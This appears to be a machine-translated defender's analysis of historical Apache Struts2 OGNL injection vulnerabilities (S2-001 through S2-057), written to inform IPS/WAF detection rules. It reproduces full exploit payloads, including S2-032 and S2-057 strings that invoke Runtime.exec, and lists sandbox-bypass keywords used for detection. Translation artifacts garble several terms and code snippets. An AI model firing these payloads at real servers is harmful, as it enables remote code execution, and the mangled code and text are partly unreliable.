Shulou(Shulou.com)05/31 Report--

The content of this article mainly focuses on how to look at the historical loopholes of Struts2 from the perspective of protection. The content of the article is clear and clear. It is very suitable for beginners to learn and is worth reading. Interested friends can follow the editor to read together. I hope you can get something through this article!

I. Preface

Struts2 vulnerability is a classic series of vulnerabilities, which is rooted in the fact that Struts2 introduces OGNL expressions to make the framework flexible and dynamic. With the patching improvement of the overall framework, it will be much more difficult to discover new Struts2 vulnerabilities than before. From the actual understanding, most users have already fixed historical high-risk vulnerabilities. At present, when doing penetration testing, Struts2 vulnerabilities mainly take a chance, or it will be more effective to attack unpatched systems after hitting the intranet.

Online analysis articles mainly analyze these Struts2 vulnerabilities from the perspective of attack utilization. As the Xinhua No. 3 attack and defense team, part of our work is to maintain the rule base of ips products. Today, we review the loopholes in this series and share with you some defenders' ideas. If there are any omissions or mistakes, please correct them.

II. Historical loopholes in Struts2

Part of the reason for studying the historical vulnerabilities of Struts2 is the protection rules of ips and waf before review. When developing rules, we think there are several principles:

1. Think from the point of view of the attacker

2. Understand the principle of vulnerabilities or attack tools

3. Consider the false positives and false positives when defining the detection rules of vulnerabilities or attack tools.

If the security device does not automatically seal the ip, then the protection rules may be slowly tested. If the rules only consider that the public poc rules are too strict, they may be bypassed, so there is this review. Let's first take a look at the principle of Struts2's historical vulnerabilities.

2.1 determine that the website uses the Struts2 framework

Generally, attackers will judge that the website is written by Struts2 before the attack, mainly depends on whether the link ends with .action or .do, because the configuration file struts.xml specifies the suffix of action.

However, after the above configuration file is parsed, uri without a suffix will also be parsed with the name action. As follows:

If the value of the constant extension in the configuration file ends with a comma or has a null value, indicating that action can be free of suffixes, then uri without suffixes may also be built by the struts2 framework.

If you use the rest plug-in for Struts2, the default struts-plugin.xml specifies the request suffix xhtml,xml and json

Depending on the suffix, the rest plug-in uses different processing flows, such as requesting data in json format, and the framework uses the JsonLibHandler class to process the output.

Requests that end with xhtml and xml are processed using HtmlHandler and XStreamHandler, respectively. So in the test, can not clearly determine whether the site is using the struts2 framework, especially in the latter two cases, you can take the tool to try your luck.

How 2.2Struts2 executes code

The dynamic nature of Struts2 lies in the fact that ongl expressions can get the value of the running variable and have the opportunity to perform function calls. If malicious request parameters can be sent to the execution process of ognl, it can lead to arbitrary code execution vulnerabilities. The ognl expression is executed in several classes related to Ognl. After configuring the debugging environment, the breakpoint of the getvalue or compileAndExecute function of the OgnlUtil class is determined according to the parameters, and the principle of execution is analyzed.

2.2.1 S2-045, S2-046

Taking S2-045 as an example, the payload for viewing the web project directory is

Content-type:% {(# fuck='multipart/form-data'). (# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# _ memberAccess? (# _ memberAccess=#dm): (# container=#context ['com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.getExcludedPackageNames (). Clear ()). (# ognlUtil.getExcludedClasses (). Clear ()). Context.setMemberAccess (# dm). (# req=@org.apache.struts2.ServletActionContext@getRequest ()). (# outstr=@org.apache.struts2.ServletActionContext@getResponse (). GetWriter ()). (# outstr.println (# req.getRealPath ("/")). (# outstr.close ()). (# ros= (@ org.apache.struts2.ServletActionContext@getResponse (). GetOutputStream (). (@ org.apache.commons.io.IOUtils@copy (# process.getInputStream ()) # ros)). (# ros.flush ())}

Breakpoint interception

View information according to the stack

GetValue:321, OgnlUtil (com.opensymphony.xwork2.ognl) getValue:363, OgnlValueStack (com.opensymphony.xwork2.ognl). Evaluate:49, OgnlTextParser (com.opensymphony.xwork2.util) translateVariables:171, TextParseUtil (com.opensymphony.xwork2.util) translateVariables:130, TextParseUtil (com.opensymphony.xwork2.util) translateVariables:52, TextParseUtil (com.opensymphony.xwork2.util). BuildErrorMessage:123, JakartaMultiPartRequest (org.apache.struts2.dispatcher.multipart) parse:105, JakartaMultiPartRequest (org.apache.struts2.dispatcher.multipart): 84 MultiPartRequestWrapper (org.apache.struts2.dispatcher.multipart) wrapRequest:841, Dispatcher (org.apache.struts2.dispatcher)

Based on the fact that the stack can locate the cause of the vulnerability, look at the Dispatcher function and find that if the content-typ field contains a multipart/form-data string, the request will be encapsulated as MultiPartRequestWrapper and go to the process of the JakartaMultiPartRequest class.

If (content_type! = null & & content_type.contains ("multipart/form-data")) {

MultiPartRequest mpr = getMultiPartRequest ()

LocaleProvider provider = getContainer () .getInstance (LocaleProvider.class)

Request = new MultiPartRequestWrapper (mpr, request, getSaveDir (), provider, disableRequestAttributeValueStackLookup)

} else {

Request = new StrutsRequestWrapper (request, disableRequestAttributeValueStackLookup)

If something goes wrong, the buildErrorMessage function is called to construct the error message.

Try {

Multi.parse (request, saveDir)

For (String error: multi.getErrors ()) {

AddError (error)

}

} catch (IOException e) {

If (LOG.isWarnEnabled ()) {

LOG.warn (e.getMessage (), e)

}

AddError (buildErrorMessage (e, new Object [] {e.getMessage ()}))

}

The subsequent call procedure is buildErrorMessage-- > LocalizedTextUtil.findText-> TextParseUtil. TranslateVariables-> OgnlUtil.getValue. The patch modification is that buildErrorMessage does not call the LocalizedTextUtil.findText function, so the input submitted after the error is reported will not reach the ognl module. S2-046 is also the same module used in 045. overall, 045 and 046 are vulnerabilities that occurred in the first half of 17 years. The vulnerabilities use the framework itself, with few restrictions, so they are relatively easy to use Struts2 vulnerabilities (although the success rate is also very low). You can see that there are a large number of automated scanners or worms on the network, all of which come with 045 and 046 focus iPS devices to receive a large number of such logs every day.

2.2.2 S2-001

Looking forward, the more representative of the easier to use loopholes are S2-001 (S2-003005008's is relatively old, and then there are new loopholes that are easier to use, so these vulnerabilities are used by very few people, and the corresponding Struts2 version is also very low. 001 is the first loophole in the Struts2 framework at the beginning, and it is also close to the implementation process of 045, all through TextParseUtil. TranslateVariables executes OGNL expressions, and TextParseUtil is a functional class for text processing. The difference is that when S2-001 generates jsp into the java class, it calls evaluateParams on the parameters submitted by the form to invoke the OGNL evaluation function of the text processing class. The call stack is as follows:

TranslateVariables:72, TextParseUtil (com.opensymphony.xwork2.util) findValue:303, Component (org.apache.struts2.components) evaluateParams:680, UIBean (org.apache.struts2.components) end:450, UIBean (org.apache.struts2.components) doEndTag:36, ComponentTagSupport (org.apache.struts2.views.jsp) _ jspx_meth_s_005ftextfield_005f0:17, quiz_002dbasic_jsp (org.apache.jsp.validation)... .Payload:% 25%7B%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest ()% 2C%23response%3D%23context.get (% 22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22) .getWriter ()% 2C%23response.println (% 23req.getRealPath ('% 2F'))% 2C%23response.flush ()% 2C%23response.close ()% 7D

A submission can trigger a vulnerability.

2.2.3 S2-016

Then there is S2-016, and S2-03, and S2-03, and S2-037, these loopholes are relatively close, of which S2-016 is relatively easy to use, because it is too old, it is almost impossible to exploit successfully, but this loophole is so classic that it is worth seeing.

The Payload for obtaining the path is:

Redirect:$%7B%23a%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),% 23b%3d%23a.getRealPath (% 22 com.opensymphony.xwork2.dispatcher.HttpServletResponse'),% 23matt%3d%23context.get (' com.opensymphony.xwork2.dispatcher.HttpServletResponse'),% 23matt.getWriter () .println (% 23b),% 23matt.getWriter () .flush (),% 23matt.getWriter () .close ()% 7D

Follow the redirect tag directly after uri

Call stack:

GetValue:255, OgnlUtil (com.opensymphony.xwork2.ognl). TranslateVariables:170, TextParseUtil (com.opensymphony.xwork2.util). Execute:161, ServletRedirectResult (org.apache.struts2.dispatcher) serviceAction:561, Dispatcher (org.apache.struts2.dispatcher) executeAction:77, ExecuteOperations (org.apache.struts2.dispatcher.ng) doFilter:93, StrutsExecuteFilter (org.apache.struts2.dispatcher.ng.filter) internalDoFilter:235, ApplicationFilterChain (org.apache.catalina.core)

Code comments mean that under the Struts2 framework, if the mapping can get the result directly, the execute function of the result object is called.

The redirect in the Uri tag corresponds to the result of ServletRedirectResult. The constructor function is as follows, which is constructed incidentally when DefaultActionMapper is constructed.

Public DefaultActionMapper () {

PrefixTrie = new PrefixTrie () {

{

Put (METHOD_PREFIX, new ParameterAction () {

Public void execute (String key, ActionMapping mapping) {

If (allowDynamicMethodCalls) {

Mapping.setMethod (key.substring (

METHOD_PREFIX.length ())

}

}

});

Put (ACTION_PREFIX, new ParameterAction () {

Public void execute (String key, ActionMapping mapping) {

String name = key.substring (ACTION_PREFIX.length ())

If (allowDynamicMethodCalls) {

Int bang = name.indexOf ('!')

If (bang! =-1) {

String method = name.substring (bang + 1)

Mapping.setMethod (method)

Name = name.substring (0, bang)

}

}

Mapping.setName (name)

}

});

When parsing the Uri, the ServletRedirectResult result is set to the mapping object, and the call stack is as follows:

Execute:214, DefaultActionMapper$2 $3 (org.apache.struts2.dispatcher.mapper) handleSpecialParameters:361, DefaultActionMapper (org.apache.struts2.dispatcher.mapper) getMapping:317, DefaultActionMapper (org.apache.struts2.dispatcher.mapper) findActionMapping:161, PrepareOperations (org.apache.struts2.dispatcher.ng) findActionMapping:147, PrepareOperations (org.apache.struts2.dispatcher.ng) doFilter:89, StrutsPrepareFilter (org.apache.struts2.dispatcher.ng.filter)

After the execute function of ServletRedirectResult is executed, the translateVariables function of text processing class TextParseUtil is called by conditionalParse to enter the process of Ognl, and the code is executed.

2.2.4 S2-032, S2-03, S2-037

S2-032 is a vulnerability in the framework itself, but there is a prerequisite to enable the configuration of dynamic method execution.

S2-033 and S2-037 are rest plug-in vulnerabilities, generally speaking, plug-in vulnerabilities are difficult to exploit, because this plug-in is not necessarily used when developing websites. The payload of S2-032 is as follows:

Http://localhost:8080/s2032/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D), % 23str%3d%23s.hasNext ()% 3f%23s.next ()% 3a% 23parameters.ppp% 5B0% 5D 23str% 23w.print (% 23str),% 23w.close (), 1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ipconfig

Like S2-016, there is a special tag in uri, and its leak point is also in the constructor of the DefaultActionMapper class. After DynamicMethodInvocation is configured in the struts.mxl file, the if statement will be satisfied when the mapping is constructed, and the OGNL expression after setting the method attribute to the colon

Public DefaultActionMapper () {

PrefixTrie = new PrefixTrie () {

{

Put (METHOD_PREFIX, new ParameterAction () {

Public void execute (String key, ActionMapping mapping) {

If (allowDynamicMethodCalls) {

Mapping.setMethod (key.substring (METHOD_PREFIX.length ()

}

}

});

After invoking Struts2's default interceptor, go to DefaultActionInvocation's calling function invokeAction, which directly calls the execution of the Ognl expression.

S2-032 and S2-037 are also executed through this step, except that these two vulnerabilities are based on the rest plug-in. The rest plug-in makes the request of the struts2 framework restful-style, with the parameters submitted directly in the uri rather than the string after the question mark. The following is a normal request:

The exploiting payload of the vulnerability is:

Http://localhost:8080/s2033/orders/3/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=vulnerable

Payload replaces the normal edit method with ognl code. The rest plug-in uses RestActionMapper to parse uri and generate mapping. In its getMapping function, parsing uri sets the method variable.

Int lastSlashPos = fullName.lastIndexOf (47); String id = null; if (lastSlashPos >-1) {int prevSlashPos = fullName.lastIndexOf (47, lastSlashPos-1); if (prevSlashPos >-1) {mapping.setMethod (fullName.substring (lastSlashPos + 1)); fullName = fullName.substring (0, lastSlashPos); lastSlashPos = prevSlashPos;}

Then, like 032, when this method is called through an ognl expression, a malicious command is executed

S2-037 is the same as S2-032, which is a bypass of the patch. It should be that Struts2.3.28.1 has not been repaired.

These two vulnerabilities are 16 years old and require very good luck to exploit, after all, they rely on the rest plug-in and are old.

2.2.5 S2-052

This vulnerability differs from the traditional Struts2 vulnerability in that it does not use code executed by ognl expressions, but rather executes code using the unmarshal vulnerability. The disadvantage is that the rest plug-in is also used, and the jdk version is required, which should be greater than or equal to 1.8. the error report using JDK 1.7 is as follows

The JDK 1.8 test can execute the command normally.

Since the vulnerability of ongl expression execution is not used, the protection idea is also different from the regular protection of Struts2, which can be combined with the weblogic series of vulnerabilities later.

2.2.6 S2-057

There are two conditions for code execution in S2-057:

1. You need to enable the configuration of alwaysSelectFullNamespace as true. Generally, when you extract the uri in a request, you will compare the namespace in the configuration file and match the longest segment selected as the namespace for this request. But if this parameter is set to true, all the strings before action are extracted as namespace without comparison.

Protected void parseNameAndNamespace (String uri, ActionMapping mapping, ConfigurationManager configManager) {

Int lastSlash = uri.lastIndexOf (47)

String namespace

String name

If (lastSlash =-1) {

Namespace = ""

Name = uri

} else if (lastSlash = = 0) {

Namespace = "/"

Name = uri.substring (lastSlash + 1)

} else if (this.alwaysSelectFullNamespace) {

Namespace = uri.substring (0, lastSlash)

Name = uri.substring (lastSlash + 1);} else {

For example, payload uses

GET / s2057sun.reflect.' ${(# ct=#request ['struts.valueStack'] .context). (# cr=#ct [' com.opensymphony.xwork2.ActionContext.container']). (# ou=#cr.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ou.setExcludedClasses ('java.lang.Shutdown')). (# ou.setExcludedPackageNames (' sun.reflect.')). (# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# ct.setMemberAccess (# dm) ). (# cmd=@java.lang.Runtime@getRuntime (). Exec ('calc'))} / actionChain1

The overall ognl attack expression of Standard Red is extracted as namespace.

2. The result of server redirection is used. The requirement here is to configure action of actionChaining type. When configuring action results, use redirectAction (ServletActionRedirectResult class), chain (ActionChainResult class) and postback (PostbackResult class) as the result type.

Register2

Xxx

Register2

This will send the namespace to the ognl engine for execution when processing the result results. For example, in the case of redirectAction (ServletActionRedirectResult class), the distributor disptacher passes the process to the execute function of ServletActionRedirectResult based on the result of action, which sets the destination address of the jump through setLocation to its own location variable (namespace containing ognl malicious code)

Public void execute (ActionInvocation invocation) throws Exception {

This.actionName = this.conditionalParse (this.actionName, invocation)

If (this.namespace = = null) {

This.namespace = invocation.getProxy () .getNamespace ()

} else {

This.namespace = this.conditionalParse (this.namespace, invocation)

}

If (this.method = = null) {

This.method = ""

} else {

This.method = this.conditionalParse (this.method, invocation)

}

String tmpLocation = this.actionMapper.getUriFromActionMapping (new ActionMapping (this.actionName, this.namespace, this.method, (Map) null))

This.setLocation (tmpLocation)

Super.execute (invocation)

}

Then call the execute function of the parent class ServletRedirectResult-> call the execute function of the parent class StrutsResultSupport

Public void execute (ActionInvocation invocation) throws Exception {

This.lastFinalLocation = this.conditionalParse (this.location, invocation)

This.doExecute (this.lastFinalLocation, invocation)

}

Protected String conditionalParse (String param, ActionInvocation invocation) {

Return this.parse & & param! = null & & invocation! = null? TextParseUtil.translateVariables (param, invocation.getStack (), new StrutsResultSupport.EncodingParsedValueEvaluator ()): param

}

Where conditionalParse is the conditional call to TextParseUtil.translateVariables for ognl execution process, this condition is satisfied, the parameter is the previously set location variable, so the code is executed.

2.3Struts2 sandboxie Protection and Bypass

Each round of new vulnerabilities in Struts2 includes not only the new Ognl code execution point, but also the protective bypass of Ognl's sandboxie, while each round of patches not only fix the Ognl execution point, but also strengthen sandboxie again. The patches are mainly through struts-default.xml to restrict the classes and packages used by ognl, as well as to modify the access control characters of various bean functions. The latest version of Struts2.5.20 's Struts-default.xml restricts the access of java.lang.Class and java.lang.ClassLoader,java.lang.ProcessBuilder classes, which makes it impossible to execute code using constructors, process creation functions, class loaders, etc., and restricts the access of the com.opensymphony.xwork2.ognl package. As a result, variables such as _ member_access,context cannot be accessed and modified during exploit.

When debugging, you can observe the sandboxie protection of ognl at the breakpoint of SecurityMemberAccess's isAccessible function.

Public boolean isAccessible (Map context, Object target, Member member, String propertyName) {

LOG.debug ("Checking access for [target: {}, member: {}, property: {}]", target, member, propertyName)

If (this.checkEnumAccess (target, member)) {

LOG.trace ("Allowing access to enum: {}", target)

Return true

} else {

Class targetClass = target.getClass ()

Class memberClass = member.getDeclaringClass ()

If (Modifier.isStatic (member.getModifiers ()) & & this.allowStaticMethodAccess) {

LOG.debug ("Support for accessing static methods [target: {}, member: {}, property: {}] is deprecated!", target, member, propertyName)

If (! this.isClassExcluded (member.getDeclaringClass () {

TargetClass = member.getDeclaringClass ()

}

Third, the protection idea of Struts2 on the network side

The general ips and waf rules can be detected from two directions, one is to detect the point where the vulnerability occurs, and the other is to detect the attack code used. Struts2 has some old vulnerabilities, many of which are submitted ognl code in url or post forms, which is not easy to detect from the point of view of the loophole, so the general detection rule is to check the ognl code to match the point where the vulnerability occurs. Combined with payload, the composition of ognl code, the most technical ognl code is the two payload of 045 and 057, or from the payload of 045.

Content-type:% {(# fuck='multipart/form-data'). (# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# _ memberAccess? (# _ memberAccess=#dm): (# container=#context ['com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.getExcludedPackageNames (). Clear ()). (# ognlUtil.getExcludedClasses (). Clear ()). Context.setMemberAccess (# dm). (# req=@org.apache.struts2.ServletActionContext@getRequest ()). (# outstr=@org.apache.struts2.ServletActionContext@getResponse (). GetWriter ()). (# outstr.println (# req.getRealPath ("/")). (# outstr.close ()). (# ros= (@ org.apache.struts2.ServletActionContext@getResponse (). GetOutputStream (). (@ org.apache.commons.io.IOUtils@copy (# process.getInputStream ()) # ros)). (# ros.flush ())}

The _ memberAccess variable of OgnlContext imposes access control restrictions that determine which classes, which packages, and which methods can be used by ognl expressions. Patch prior to 045 forbids access to _ memberAccess:

# container=#context ['com.opensymphony.xwork2.ActionContext.container'])

Payload gets the Container through the ActionContext object:

# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class

Then use the getInstance method of Container to get the ognlUtil instance:

# ognlUtil.getExcludedPackageNames () .clear () # ognlUtil.getExcludedClasses () .clear ()

Classes and packages that are forbidden to access are cleared through ognlUtil's public methods, followed by regular output stream fetches and function calls. The payload of this ognl is typical, and there are many points that can be detected.

Generally speaking, the Struts2 rules of ips or waf can detect the objects and methods used by sandboxie to bypass. For example, _ memberaccess,getExcludedPackageNames,getExcludedClasses,DEFAULT_MEMBER_ACCESS is a good detection point, and defense rules can also detect function calls ServletActionContext@getResponse (get reply object), java.lang.ProcessBuilder (process build, execute command), java.lang.Runtime (runtime class build, execute command), java.io.FileOutputStream (file output stream, write shell). GetParameter (get parameters), org.apache.commons.io.IOUtils (IO function). Poor checkpoints include the key of a dictionary like com.opensymphony.xwork2.ActionContext.container or the full name of a package. After all, strings can be concatenated and deformed, a rule that can be easily bypassed. At other times, the strings extracted by the rules should be as short as possible to avoid deformation bypass.

The test found that some waf product rules only detect one of the two strings DEFAULT_MEMBER_ACCESS and _ memberaccess, which looks rough and has the risk of false positives, but the detection effect is still good. Because of its flexibility, there are some deformation escapes in Ognl expressions, but it is difficult for sandboxie to bypass the loopholes after S2-016.It is difficult to avoid these two objects and related function calls. Bypass can refer to the ognl.jjt file, which defines the lexical and grammatical structure of ognl expressions, ognl parsing code is also generated based on this file, so general bypass can also be based on this file.

Thank you for your reading. I believe you have a certain understanding of "how to look at Struts2 historical loopholes from the perspective of protection". Go ahead and practice it. If you want to know more about it, you can follow the website! The editor will continue to bring you better articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.